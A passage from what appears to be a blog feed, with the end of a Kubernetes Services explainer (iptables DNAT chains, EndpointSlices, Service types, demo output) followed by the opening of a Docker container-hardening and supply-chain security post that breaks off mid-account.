<li><strong>Five Service types.</strong> ClusterIP (internal), NodePort (every-node port, dev/test), LoadBalancer (cloud-provided external LB for prod), ExternalName (DNS CNAME alias for managed services), Headless (<code>clusterIP: None</code>, DNS returns pod IPs directly — for StatefulSets).</li>
<li><strong>The dataplane is the kernel.</strong> Three controllers cooperate to write iptables rules, but the actual packet forwarding is pure Linux netfilter. The Service object is metadata; the kernel does the work.</li>
</ol>
<h2 id="heading-part-1-why-services-exist">Part 1: Why Services exist</h2>
<p>The Kubernetes pod model is deliberately ephemeral. Pods get rescheduled, restarted, scaled up and down. <strong>Pod IPs change every time</strong>. There is no permanent address.</p>
<p>This is by design. Kubernetes treats pods as cattle, not pets. The system is at its best when no individual pod is precious and the whole workload can be reshuffled across the cluster. But applications need to talk to each other, and applications need a stable target.</p>
<p>A Service is the answer. It is a stable identity for an unstable set of pods. You give it a label selector (<code>app: nginx</code>). Any pod that matches the selector becomes a backend. The Service exposes one virtual IP, called the ClusterIP. Pods come and go. The ClusterIP stays.</p>
<p>Without this abstraction, you would be writing service discovery code from scratch in every application, forever. Every microservice architecture in Kubernetes depends on this idea. It is so fundamental that it is easy to miss how clever it is.</p>
<h2 id="heading-part-2-what-happens-when-you-create-a-service">Part 2: What happens when you create a Service</h2>
<p>One command:</p>
<pre><code class="lang-bash">$ kubectl expose deployment nginx --port=80
service/nginx exposed
</code></pre>
<p>Behind that one line, an entire pipeline of controllers wakes up.</p>
<h3 id="heading-step-1-the-api-server-allocates-a-clusterip">Step 1: The API server allocates a ClusterIP</h3>
<p>The API server receives the create request, runs admission, runs validation. Then it allocates a ClusterIP from the configured <code>--service-cluster-ip-range</code> (typically <code>10.96.0.0/12</code>).</p>
<p>Since Kubernetes 1.33, the IP allocator is backed by first-class <code>IPAddress</code> and <code>ServiceCIDR</code> objects. You can run:</p>
<pre><code class="lang-bash">$ kubectl get ipaddresses
NAME           PARENTREF
10.96.255.20   services/default/my-service
</code></pre>
<p>This used to be a bitmap stored in etcd. Now it's a clean API. The Service object gets the allocated IP stamped onto <code>spec.clusterIP</code>, the write goes to etcd via Raft, and the Service exists. <strong>At this point, no pod is connected to it yet.</strong> The Service is just metadata.</p>
<h3 id="heading-step-2-the-endpointslice-controller-fills-the-slice">Step 2: The EndpointSlice controller fills the slice</h3>
<p>The EndpointSlice controller runs inside <code>kube-controller-manager</code>. It has two informers: one watches Services, one watches Pods. When a new Service appears, the controller scans every pod in the namespace. For each pod that matches the selector AND is <code>Ready</code>, it builds a slice entry: pod IP, pod node, ports, conditions.</p>
<p>The output is one or more <code>EndpointSlice</code> objects, capped at 100 endpoints each. A Service with three pods has one slice. A Service with three thousand pods has thirty.</p>
<p>Each slice has an <code>ownerReference</code> to the Service (so deletion cascades) and labels:</p>
<ul>
<li><code>kubernetes.io/service-name: my-service</code></li>
<li><code>endpointslice.kubernetes.io/managed-by: endpointslice-controller.k8s.io</code></li>
</ul>
<p>That's how kube-proxy knows which Service a slice belongs to.</p>
<blockquote>
<p>Side note worth knowing: the legacy <code>Endpoints</code> API was officially deprecated in 1.33 (KEP-4974). It still works for older controllers, but <code>EndpointSlices</code> are the source of truth now.</p>
</blockquote>
<h3 id="heading-step-3-kube-proxy-on-every-node-reprograms">Step 3: kube-proxy on every node reprograms</h3>
<p>There is a kube-proxy pod on every node, deployed as a DaemonSet in nearly every installer. It has Service and EndpointSlice informers. When a slice changes, kube-proxy diffs the new state against the kernel's current rules, then batches the changes into a single <code>iptables-restore</code> call. The whole rule set is replaced as one transaction.</p>
<p>Three nodes, three independent reprograms, all in parallel. Total time on a normal cluster: milliseconds.</p>
<h3 id="heading-step-4-what-gets-programmed">Step 4: What gets programmed</h3>
<p>The actual rules look like this (real captured output from a kind 1.35.1 cluster, slightly trimmed):</p>
<pre><code>-A KUBE-SERVICES -d <span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>/<span class="hljs-number">32</span> -p tcp --dport <span class="hljs-number">80</span> -j KUBE-SVC-FXIYY
-A KUBE-SVC-FXIYY -m statistic --mode random --probability <span class="hljs-number">0.333</span> -j KUBE-SEP<span class="hljs-number">-1</span>
-A KUBE-SVC-FXIYY -m statistic --mode random --probability <span class="hljs-number">0.500</span> -j KUBE-SEP<span class="hljs-number">-2</span>
-A KUBE-SVC-FXIYY -j KUBE-SEP<span class="hljs-number">-3</span>
-A KUBE-SEP<span class="hljs-number">-1</span> -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.42</span>:<span class="hljs-number">80</span>
-A KUBE-SEP<span class="hljs-number">-2</span> -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.18</span>:<span class="hljs-number">80</span>
-A KUBE-SEP<span class="hljs-number">-3</span> -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.07</span>:<span class="hljs-number">80</span>
</code></pre><p><code>KUBE-SERVICES</code> is the entry chain. Every Service port has a match rule that jumps to a per-Service chain, named <code>KUBE-SVC-</code> plus a hash of the service name. That chain has one rule per backend, with a <code>--mode random --probability 1/n</code> declining pattern. Each backend rule jumps to a per-endpoint <code>KUBE-SEP-</code> chain that does the actual DNAT.</p>
<p>iptables is the default mode. nftables (GA in 1.33) uses <code>verdict maps</code> for sub-microsecond hash lookup instead of the linear scan; recommended for modern Linux clusters. IPVS mode was deprecated in 1.35 and is now legacy.</p>
<h3 id="heading-step-5-coredns-adds-the-name">Step 5: CoreDNS adds the name</h3>
<p>There's a Service called <code>kube-dns</code> in the <code>kube-system</code> namespace, backed by CoreDNS pods. Every pod's <code>/etc/resolv.conf</code> has the kube-dns ClusterIP as its nameserver. CoreDNS has a <code>kubernetes</code> plugin that watches Services. When <code>my-service</code> appears, CoreDNS now resolves <code>my-service.default.svc.cluster.local</code> to the ClusterIP.</p>
<p>Three controllers cooperated, plus DNS, and the Service is live. Total time from <code>kubectl expose</code> to first traffic flowing: under a second.</p>
<h2 id="heading-part-3-what-happens-when-traffic-calls-a-service">Part 3: What happens when traffic calls a Service</h2>
<p><code>kubectl exec</code> into a busybox pod, run <code>curl my-service</code>. Two seconds later: <code>&lt;title&gt;Welcome to nginx!&lt;/title&gt;</code>. Now slow that down to seven steps.</p>
<h3 id="heading-step-1-dns-resolution">Step 1: DNS resolution</h3>
<p>The pod sees <code>curl my-service</code>, but <code>my-service</code> is not a real hostname. The pod's resolver consults its search list (<code>default.svc.cluster.local</code>, <code>svc.cluster.local</code>, <code>cluster.local</code>). It tries <code>my-service.default.svc.cluster.local</code> first. The query goes to CoreDNS, which has the kubernetes plugin watching Services, and returns the ClusterIP.</p>
<h3 id="heading-step-2-tcp-packet-to-clusterip">Step 2: TCP packet to ClusterIP</h3>
<p>The pod opens a TCP connection. SYN packet, destination ClusterIP, port 80. The packet leaves the pod's <code>veth</code> pair, enters the host's network namespace. PREROUTING.</p>
<h3 id="heading-step-3-kube-services-matches">Step 3: KUBE-SERVICES matches</h3>
<p>The packet hits the <code>KUBE-SERVICES</code> chain. Every Service port has a match rule here. The rule says: destination is <code>10.96.255.20</code>, port <code>80</code>? Jump to <code>KUBE-SVC-FXIYY</code>. Now the packet is inside the per-Service chain.</p>
<h3 id="heading-step-4-mode-random-picks-one">Step 4: --mode random picks one</h3>
<p><code>KUBE-SVC-FXIYY</code> has one rule per backend, with the declining-probability pattern:</p>
<ul>
<li>Rule 1 fires with <code>probability 1/3</code> → <code>KUBE-SEP-1</code></li>
<li>Rule 2 fires with <code>probability 1/2</code> of what's left → <code>KUBE-SEP-2</code></li>
<li>Rule 3 is the unconditional fallthrough → <code>KUBE-SEP-3</code></li>
</ul>
<p>The math works out: each backend gets exactly one third of the traffic. iptables <code>-m statistic --mode random</code> is the underlying mechanism.</p>
<h3 id="heading-step-5-dnat-rewrites-the-destination">Step 5: DNAT rewrites the destination</h3>
<p>The chosen rule jumps to <code>KUBE-SEP-2</code>. That chain has one rule:</p>
<pre><code>-j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.18</span>:<span class="hljs-number">80</span>
</code></pre><p>The kernel rewrites the destination of the packet from ClusterIP to the actual pod IP. The packet is no longer for the virtual address. It is now headed at a real pod, on a real node.</p>
<h3 id="heading-step-6-backend-receives">Step 6: Backend receives</h3>
<p>The packet routes to the backend pod's node, traverses the CNI bridge or overlay, arrives at the backend. The pod sees a normal TCP packet to its own IP, port 80. It sends back a SYN-ACK. <strong>The backend has no idea it was reached via a Service abstraction.</strong></p>
<h3 id="heading-step-7-reply-rewriting-via-conntrack">Step 7: Reply rewriting via conntrack</h3>
<p>The reply traffic is where the trick happens. Source IP is the backend pod. Destination is the original sender. But the Linux conntrack table remembers the DNAT we did on the way in. So when the reply comes back through the host, conntrack rewrites the source IP from the backend pod, back to the ClusterIP.</p>
<p>The original sender pod sees the response coming from the ClusterIP, exactly the address it sent the packet to. Connection works. End to end. <strong>The pod has no idea this dance happened.</strong></p>
<h2 id="heading-part-4-all-five-service-types-with-real-use-cases">Part 4: All five Service types (with real use cases)</h2>
<p>Most "Service types" content stops at three. There are five, and each one solves a different problem.</p>
<h3 id="heading-1-clusterip">1. ClusterIP</h3>
<p>The default. Virtual IP, internal only. This is what we just walked through.</p>
<p><strong>Use case:</strong> application-to-application traffic inside the cluster. Frontend talks to backend. Microservice A calls microservice B. Both inside the cluster. By far the most common type.</p>
<h3 id="heading-2-nodeport">2. NodePort</h3>
<p>NodePort opens the same port on every node in the cluster, in the range <code>30000–32767</code>. Traffic to any node on that port gets forwarded to the ClusterIP, and from there to a pod.</p>
<p><strong>Use case:</strong> local development clusters like kind or minikube, where you don't have a cloud load balancer to provision. NodePort is also a building block — <code>LoadBalancer</code> Services use it under the hood.</p>
<h3 id="heading-3-loadbalancer">3. LoadBalancer</h3>
<p>This is what you use in production for public-facing apps. When you create a <code>LoadBalancer</code> Service on EKS, GKE, or AKS, the cloud provider integration provisions a real external load balancer and points it at the NodePort on each node. You get a public IP. Real users hit it.</p>
<p><strong>Use case:</strong> production-facing web apps. The browser-to-cluster ingress path.</p>
<h3 id="heading-4-externalname">4. ExternalName</h3>
<p>This is the type most people skip. <code>ExternalName</code> has no ClusterIP, no selector, no pods. It's a DNS CNAME alias inside the cluster.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">my-database</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">ExternalName</span>
  <span class="hljs-attr">externalName:</span> <span class="hljs-string">prod-db.us-east-1.rds.amazonaws.com</span>
</code></pre>
<p>Now any pod can <code>curl my-database</code>, and the cluster DNS returns the AWS hostname.</p>
<p><strong>Use case:</strong> pointing in-cluster names at managed external services. Your apps look up <code>my-database</code>, the underlying address is a managed Postgres in RDS, and you can swap the target without changing application code. Same pattern works for managed Redis, S3-compatible stores, anything external.</p>
<h3 id="heading-5-headless">5. Headless</h3>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cassandra-svc</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">clusterIP:</span> <span class="hljs-string">None</span>       <span class="hljs-comment"># ← the magic</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">cassandra</span>
</code></pre>
<p>There is no virtual IP, no kube-proxy involvement, no DNAT. Instead, DNS returns the IPs of all backend pods directly. With a StatefulSet, each pod also gets a stable DNS name like <code>cassandra-0.cassandra-svc.default</code>.</p>
<p><strong>Use case:</strong> StatefulSets. Each pod gets a stable DNS name for peer discovery in distributed systems (Cassandra nodes finding each other, Kafka brokers, etcd peers). Custom client-side load balancing where the client wants to choose the backend itself, not have iptables choose. Anything that needs to talk to specific pods, not a load-balanced abstraction.</p>
<h3 id="heading-the-summary">The summary</h3>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Type</td><td>Use case</td></tr>
</thead>
<tbody>
<tr>
<td>ClusterIP</td><td>Inside the cluster</td></tr>
<tr>
<td>NodePort</td><td>Dev clusters, building block</td></tr>
<tr>
<td>LoadBalancer</td><td>Public production traffic</td></tr>
<tr>
<td>ExternalName</td><td>Alias managed services</td></tr>
<tr>
<td>Headless</td><td>Stateful workloads</td></tr>
</tbody>
</table>
</div><p>Most teams over-use <code>LoadBalancer</code> when <code>ClusterIP</code> plus an Ingress would do. Pick the right one for the job.</p>
<h2 id="heading-part-5-live-demo">Part 5: Live demo</h2>
<p>To make all of this concrete, we ran the create-and-call flow on a real cluster (kind 1.35.1, three workers). What follows are verbatim outputs.</p>
<pre><code>$ kubectl get nodes
NAME                         STATUS   ROLES           AGE   VERSION
service-demo-control-plane   Ready    control-plane   <span class="hljs-number">24</span>s   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>
service-demo-worker          Ready    &lt;none&gt;          <span class="hljs-number">14</span>s   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>
service-demo-worker2         Ready    &lt;none&gt;          <span class="hljs-number">14</span>s   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>
service-demo-worker3         Ready    &lt;none&gt;          <span class="hljs-number">14</span>s   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>
</code></pre><p>Apply an nginx Deployment with three replicas, then a Service:</p>
<pre><code>$ kubectl apply -f nginx-deploy.yaml
deployment.apps/nginx created

$ kubectl get pods -o wide
NAME                    READY   STATUS    RESTARTS   AGE   IP           NODE
nginx-fd956d49d<span class="hljs-number">-49779</span>   <span class="hljs-number">1</span>/<span class="hljs-number">1</span>     Running   <span class="hljs-number">0</span>          <span class="hljs-number">12</span>s   <span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.2</span>   service-demo-worker2
nginx-fd956d49d<span class="hljs-number">-5</span>pbsm   <span class="hljs-number">1</span>/<span class="hljs-number">1</span>     Running   <span class="hljs-number">0</span>          <span class="hljs-number">12</span>s   <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.2</span>   service-demo-worker
nginx-fd956d49d-g94jr   <span class="hljs-number">1</span>/<span class="hljs-number">1</span>     Running   <span class="hljs-number">0</span>          <span class="hljs-number">12</span>s   <span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.2</span>   service-demo-worker3

$ kubectl apply -f my-service.yaml
service/my-service created

$ kubectl get svc my-service
NAME         TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)   AGE
my-service   ClusterIP   <span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>   &lt;none&gt;        <span class="hljs-number">80</span>/TCP    <span class="hljs-number">2</span>s
</code></pre><p>The Service has no IPs in its spec — only the selector:</p>
<pre><code>$ kubectl get svc my-service -o yaml | grep -A <span class="hljs-number">8</span> spec:
spec:
  clusterIP: <span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>
  <span class="hljs-attr">internalTrafficPolicy</span>: Cluster
  <span class="hljs-attr">ipFamilies</span>:
  - IPv4
  <span class="hljs-attr">ipFamilyPolicy</span>: SingleStack
  <span class="hljs-attr">ports</span>:
  - port: <span class="hljs-number">80</span>
  <span class="hljs-attr">selector</span>:
    app: nginx
</code></pre><p>The 1.33+ <code>IPAddress</code> object shows it as a first-class allocation:</p>
<pre><code>$ kubectl get ipaddresses
NAME           PARENTREF
<span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>   services/<span class="hljs-keyword">default</span>/my-service
</code></pre><p>The EndpointSlice has the real backend IPs:</p>
<pre><code>$ kubectl get endpointslices -l kubernetes.io/service-name=my-service
NAME               ADDRESSTYPE   PORTS   ENDPOINTS                            AGE
my-service-x29k9   IPv4          <span class="hljs-number">80</span>      <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.2</span>,<span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.2</span>,<span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.2</span>     <span class="hljs-number">8</span>s
</code></pre><p>And the iptables rules on a worker show the chain we described:</p>
<pre><code>$ docker exec service-demo-worker iptables-save | grep my-service
-A KUBE-SERVICES -d <span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>/<span class="hljs-number">32</span> -p tcp -m tcp --dport <span class="hljs-number">80</span> -j KUBE-SVC-FXIYY6OHUSNBITIX
-A KUBE-SVC-FXIYY6OHUSNBITIX -m statistic --mode random --probability <span class="hljs-number">0.33333333349</span> -j KUBE-SEP<span class="hljs-number">-4</span>B2TTHBRUYTSCT32
-A KUBE-SVC-FXIYY6OHUSNBITIX -m statistic --mode random --probability <span class="hljs-number">0.50000000000</span> -j KUBE-SEP-FAW7RO5CDYGWP4Y3
-A KUBE-SVC-FXIYY6OHUSNBITIX -j KUBE-SEP<span class="hljs-number">-4</span>UWZBYSYCGDXTWU5
-A KUBE-SEP<span class="hljs-number">-4</span>B2TTHBRUYTSCT32 -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.2</span>:<span class="hljs-number">80</span>
-A KUBE-SEP-FAW7RO5CDYGWP4Y3 -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.2</span>:<span class="hljs-number">80</span>
-A KUBE-SEP<span class="hljs-number">-4</span>UWZBYSYCGDXTWU5 -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.2</span>:<span class="hljs-number">80</span>
</code></pre><p>Real ClusterIP. Real chain hash. Real probabilities. Real pod IPs. The math (<code>0.33333</code>, <code>0.50000</code>, fallthrough) is exactly what we derived earlier.</p>
<p>Now <code>curl</code> from inside the cluster:</p>
<pre><code>$ kubectl run curl --rm -i --restart=Never --image=busybox:<span class="hljs-number">1.36</span> -- wget -q -O - http:<span class="hljs-comment">//my-service</span>
&lt;!DOCTYPE html&gt;
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>Welcome to nginx!<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span>
...</span>
</code></pre><p>Welcome to nginx. The pod knew nothing about iptables, KUBE-SVC chains, DNAT, or conntrack. It just curled <code>my-service</code> and got a response.</p>
<p>Scale up to ten replicas, watch everything reprogram in real time:</p>
<pre><code>$ kubectl scale deploy/nginx --replicas=<span class="hljs-number">10</span>
deployment.apps/nginx scaled

$ kubectl get endpointslices -l kubernetes.io/service-name=my-service
NAME               ADDRESSTYPE   PORTS   ENDPOINTS                                      AGE
my-service-x29k9   IPv4          <span class="hljs-number">80</span>      <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.2</span>,<span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.2</span>,<span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.2</span> + <span class="hljs-number">7</span> more...   <span class="hljs-number">1</span>m42s

$ docker exec service-demo-worker iptables-save | grep -c <span class="hljs-string">'KUBE-SVC-FXIYY.*statistic'</span>
<span class="hljs-number">9</span>
</code></pre><p>Three rules became nine. (Tenth backend is the unconditional fallthrough, no <code>--probability</code> on it.) From <code>kubectl scale</code> to all kube-proxies reprogrammed: about 200 milliseconds.</p>
<h2 id="heading-three-takeaways">Three takeaways</h2>
<ol>
<li><p><strong>The Service object is metadata. The dataplane is the kernel.</strong> Nothing in the Service object knows about pod IPs. The kernel's iptables (or nftables) rules carry that mapping. When you understand this, you stop thinking of Services as magic and start thinking of them as cleverly placed netfilter rules.</p>
</li>
<li><p><strong>EndpointSlice is the bridge.</strong> When a Pod becomes Ready, the EndpointSlice controller writes its IP. kube-proxy reads. The kernel obeys. Three controllers, no shared state, all eventually consistent — and reprogramming completes in milliseconds even on big clusters.</p>
</li>
<li><p><strong>Use the right Service type for the job.</strong> ClusterIP for internal traffic. NodePort for dev clusters. LoadBalancer for public production. ExternalName to alias external services. Headless for StatefulSets. Most teams over-use LoadBalancer when ClusterIP-plus-Ingress would have been the right choice.</p>
</li>
</ol>
<h2 id="heading-where-to-go-from-here">Where to go from here</h2>
<p>The full video walks the 5-part flow in 10 minutes with animated visuals for each step. Link at the top of this post.</p>
<p>Sources for every claim in this post:</p>
<ul>
<li><code>pkg/registry/core/service/storage/alloc.go</code> — ClusterIP allocator</li>
<li><code>pkg/controller/endpointslice/</code> — EndpointSlice controller</li>
<li><code>pkg/proxy/iptables/proxier.go</code> — kube-proxy iptables rules</li>
<li><code>pkg/proxy/nftables/</code> — nftables backend (GA 1.33)</li>
<li>KEP-1880 — MultiCIDRServiceAllocator (ServiceCIDR objects)</li>
<li>KEP-3866 — kube-proxy nftables backend</li>
<li>KEP-4974 — Endpoints API deprecation</li>
<li>The terminal output above is verbatim from a real Kubernetes 1.35.1 kind cluster, captured for this post.</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Day 7: Ship It - and What Comes Next]]></title><description><![CDATA[7 Days of Docker (2026) - The Finale. A Docker Captain's guide. Not your average tutorial.

Your container is probably not safe to ship.
I know that sounds harsh after six days of building. You have i]]></description><link>https://blog.kubesimplify.com/day-7-ship-it-and-what-comes-next</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-7-ship-it-and-what-comes-next</guid><category><![CDATA[Docker]]></category><category><![CDATA[Security]]></category><category><![CDATA[docker scout]]></category><category><![CDATA[Devops]]></category><category><![CDATA[hardenedimages]]></category><category><![CDATA[LearnDocker]]></category><category><![CDATA[DockerCaptain]]></category><category><![CDATA[production-ready]]></category><category><![CDATA[cloud native]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Mon, 04 May 2026 05:35:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/08b1aba6-a3e8-43ee-b05e-5a27414ba94b.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong> - The Finale. A Docker Captain's guide. Not your average tutorial.</p>
</blockquote>
<p>Your container is probably not safe to ship.</p>
<p>I know that sounds harsh after six days of building. You have images, Dockerfiles, multi-stage builds, Compose stacks - real skills. But here is the uncomfortable truth: everything we built in Days 1 through 6 was optimized for <em>working</em>. Today we optimize for <em>not getting breached</em>.</p>
<p>This is the part of Docker that separates side projects from production systems. The part most tutorials skip entirely. The part I wish someone had drilled into me before I shipped my first container to a real cluster.</p>
<p>Let's fix every container you have ever built.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/b686cc9f-bebb-4762-ac20-122a55867087.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Your Container Runs as Root. That's a Problem.</h2>
<p>By default, every Docker container runs as root. Not "sort of root." Not "sandboxed root." Root. UID 0. The same identity that owns every file on a Linux system.</p>
<p>Why does this matter? Because container isolation is not perfect. Kernel exploits exist. Misconfigurations happen. If an attacker escapes a container running as root, they land on the host as root. Game over. Your entire machine - every other container, every secret, every volume - is theirs.</p>
<p>The fix is embarrassingly simple:</p>
<pre><code class="language-bash">$ docker run --rm --user 1000:1000 alpine id
uid=1000 gid=1000 groups=1000
</code></pre>
<p>That is it. One flag. The process now runs as an unprivileged user. In production Dockerfiles, you bake this in permanently:</p>
<pre><code class="language-dockerfile">FROM node:20-alpine
RUN addgroup -S appgroup &amp;&amp; adduser -S appuser -G appgroup
USER appuser
CMD ["node", "server.js"]
</code></pre>
<p>After <code>USER appuser</code>, every subsequent instruction and the runtime process itself run as that user. No root. No exceptions.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> "But my app needs to bind to port 80!" No, it does not. Bind to port 3000 or 8080 inside the container, then map it to whatever port you want on the host with <code>-p 80:3000</code>. Needing port 80 inside the container is not a reason to run as root - it is a sign your architecture needs rethinking.</p>
</blockquote>
<hr />
<h2>Read-Only Filesystem: If They Can't Write, They Can't Attack</h2>
<p>A writable filesystem inside a container means an attacker can drop malware, modify binaries, or plant a reverse shell. A read-only filesystem shuts all of that down:</p>
<pre><code class="language-bash">$ docker run --rm --read-only alpine sh -c "echo test &gt; /file"
sh: can't create /file: Read-only file system
</code></pre>
<p>The write was blocked by the kernel. Nothing gets through. But your app probably needs to write <em>somewhere</em> - temp files, logs, PID files. The answer is <code>--tmpfs</code>, which mounts a writable in-memory filesystem at a specific path:</p>
<pre><code class="language-bash">docker run --rm --read-only --tmpfs /tmp alpine sh -c "echo test &gt; /tmp/file &amp;&amp; echo 'OK'"
</code></pre>
<p>The root filesystem stays immutable. <code>/tmp</code> is writable but exists only in RAM and vanishes when the container stops. Attackers cannot persist anything.</p>
<hr />
<h2>Resource Limits: Because Runaway Containers Kill Hosts</h2>
<p>Without limits, a single container with a memory leak or a fork bomb can starve every other process on the machine - including your other containers. Docker uses Linux cgroups to enforce hard boundaries:</p>
<pre><code class="language-bash">$ docker run --rm --memory=128m alpine cat /sys/fs/cgroup/memory.max
134217728
</code></pre>
<p>That is exactly 128 MB (128 x 1024 x 1024 = 134,217,728 bytes). If the process exceeds this, the kernel OOM-kills it. Not "warns it." Kills it. That is the correct behavior - a container that violates its resource contract should die, not drag down the host.</p>
<table>
<thead>
<tr>
<th>Flag</th>
<th>What It Enforces</th>
</tr>
</thead>
<tbody><tr>
<td><code>--memory=128m</code></td>
<td>Hard memory ceiling. OOM-kill on breach.</td>
</tr>
<tr>
<td><code>--cpus=0.5</code></td>
<td>CPU throttling. Container gets half a core.</td>
</tr>
<tr>
<td><code>--pids-limit=50</code></td>
<td>Max process count. Prevents fork bombs.</td>
</tr>
</tbody></table>
<hr />
<h2>No New Privileges and Capability Dropping</h2>
<p>Two more flags that should be on every production container:</p>
<p><code>--security-opt=no-new-privileges</code> prevents any process inside the container from gaining additional privileges through setuid/setgid binaries. Even if an attacker finds a SUID binary, they cannot escalate.</p>
<p><code>--cap-drop=ALL</code> strips every Linux capability. By default, Docker grants containers a broad set - enough to do things like change file ownership, bind to privileged ports, and manipulate network interfaces. Drop them all, then add back only what you need:</p>
<pre><code class="language-bash">docker run --rm \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --security-opt=no-new-privileges \
  myapp
</code></pre>
<p>This container can bind to privileged ports and nothing else. No changing file ownership. No raw network access. No kernel module loading. The attack surface shrinks dramatically.</p>
<h3>The Production Run Template</h3>
<p>Putting it all together, here is what a hardened <code>docker run</code> looks like:</p>
<pre><code class="language-bash">docker run -d --name myapp \
  --user 1000:1000 \
  --read-only \
  --tmpfs /tmp \
  --memory=128m \
  --cpus=0.5 \
  --pids-limit=50 \
  --cap-drop=ALL \
  --security-opt=no-new-privileges \
  --restart=unless-stopped \
  -p 8080:3000 \
  myapp:v1.2.3
</code></pre>
<p>Every flag is a security layer. Remove any one of them and you open a hole. This is defense in depth - the principle that no single control is enough, but <em>all of them together</em> make a breach extremely difficult.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/3865e9da-2cc3-4386-bb23-162732004020.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Docker Scout as a CI Gate</h2>
<p>Security hardening at runtime is half the battle. The other half is knowing what vulnerabilities are baked into your image <em>before</em> you ship it. Docker Scout scans your images for known CVEs and gives you a blunt summary:</p>
<pre><code class="language-bash">$ docker scout quickview nginx:alpine
 Target             │  nginx:alpine            │    0C     2H     10M     2L     1?
   digest           │  7f7dcd27f920            │
 Base image         │  nginx:1-alpine-slim     │    0C     0H     1M     0L
 Updated base image │  nginx:1.30-alpine-slim  │    0C     0H     1M     0L
</code></pre>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/0d2b31b8-9cb8-43d4-8545-25340ef3afaa.png" alt="" style="display:block;margin:0 auto" />

<p>Read that output. A freshly-pulled <code>nginx:alpine</code> - patched days ago - still has <strong>2 high and 10 medium vulnerabilities</strong>. That is before you add a single line of your own code. Now imagine an image you haven't updated in 3 months. Or 6. The numbers explode.</p>
<p>The image you pick matters more than most of the code you write on top of it.</p>
<p>In CI/CD, Scout becomes a gate. If the scan finds critical or high vulnerabilities, the pipeline fails and the image never reaches production:</p>
<pre><code class="language-yaml"># GitHub Actions - scan before push
- name: Scan for vulnerabilities
  run: |
    docker scout cves myapp:${{ github.sha }} \
      --exit-code \
      --only-severity critical,high
</code></pre>
<p>The <code>--exit-code</code> flag makes Scout return a non-zero exit code when vulnerabilities are found. Your pipeline stops. No humans required.</p>
<hr />
<h2>2026's Supply Chain Wake-Up Call</h2>
<p>In March 2026, attackers compromised Aqua Security's CI/CD pipeline and pushed backdoored Trivy scanner images to Docker Hub. The tool meant to FIND vulnerabilities became the attack vector. Thousands of CI/CD pipelines had secrets stolen.</p>
<p>Then in April 2026, it happened again. Attackers used stolen Checkmarx publisher credentials to push malicious images to <code>checkmarx/kics</code> on Docker Hub. Docker caught and quarantined it, but the pattern was clear: a stolen credential, a push through the normal publishing flow, and the attacker is inside the supply chain of every organization that pulls that tag.</p>
